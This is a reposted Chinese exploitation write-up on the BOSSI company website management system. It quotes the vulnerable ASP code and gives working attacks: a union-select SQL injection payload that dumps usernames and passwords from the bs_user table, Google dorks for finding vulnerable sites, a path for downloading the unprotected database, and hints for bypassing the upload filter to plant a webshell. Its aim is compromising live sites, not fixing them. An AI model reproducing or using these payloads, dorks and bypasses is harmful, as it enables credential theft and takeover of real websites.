欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

BOSSI 公司企业网站管理系统注入&上传漏洞利用

程序员文章站 2022-05-13 08:03:25
BOSSI 公司(企业)网站管理系统,中英文双语版,后台在同一页内同时管理添加修改资料内的中英文内容,网站的左边栏使用了模块,可以*的增加&删除,可以不用修改代码... 11-12-28...
让不懂编写网页的人也可以有自己的公司(企业)网站,基本资料都在后台管理添加修改,网站的标题、地址、版权、公司邮局、收藏等资料可以在后台的"公司资料"里管理

----------------------------------------------------
漏洞一:注入漏洞,

漏洞页面:newsinfo.asp,

漏洞代码:if not isempty(request.querystring("id")) then
id=request.querystring("id")
else
id=1
end if

set rs = server.createobject("adodb.recordset")
rs.open "select * from conews where id="&id, conn,3,3
'纪录访问次数
rs("counter")=rs("counter")+1
rs.update
ncounter=rs("counter")

id变量未处理直接代入sql查询,可注射,用啊d就行

页面二:yenewsinfo.asp

漏洞代码:<%
if not isempty(request.querystring("id")) then
id=request.querystring("id")
else
id=1
end if

set rs = server.createobject("adodb.recordset")
rs.open "select * from yenews where id="&id, conn,3,3
'纪录访问次数
rs("counter")=rs("counter")+1
rs.update
ncounter=rs("counter")
'定义内容
content=ubbcode(rs("content"))
%>

原理同上,可注入。

漏洞二:数据库下载漏洞

数据库地址:database/datashop.mdb

为建立放下载表,可任意下载!

漏洞三:上传漏洞

漏洞页面:upfile.asp ,upfilea.asp

问题代码:fileext=lcase(file.fileext)
   forumupload=split(upfiletype,"|")
   for i=0 to ubound(forumupload)
    if fileext=trim(forumupload(i)) then
     enableupload=true
     exit for
    end if
   next
   if fileext="asp" or fileext="asa" or fileext="aspx" then
    enableupload=false
   end if
   if enableupload=false then
    msg="这种文件类型不允许上传!\n\n只允许上传这几种文件类型:" & upfiletype
    founderr=true
   end if

和那个良精的上传漏洞一样,不知道是谁抄谁的代码了!注册用户,本地上传php的大马或者加空格过滤上传asp大马,具体方法我就不说了,在浅析良精企业网站管理程序一文中提到过了!不再赘述!

漏洞利用:注入,google:inurl:yenewsinfo.asp?id

注入语句:%20and%201=2%20union%20select%201,username,3,4,password%20from%20bs_user

 

BOSSI 公司企业网站管理系统注入&上传漏洞利用

或者啊d:需要手动添加表段:bs_user

BOSSI 公司企业网站管理系统注入&上传漏洞利用

数据库漏洞利用:

挖掘机:关键字:inurl:yenewsinfo.asp?id

后缀:database/datashop.mdb

BOSSI 公司企业网站管理系统注入&上传漏洞利用

关于上传漏洞的利用我就不演示了,可参照 浅析良精企业网站管理系统漏洞 一文。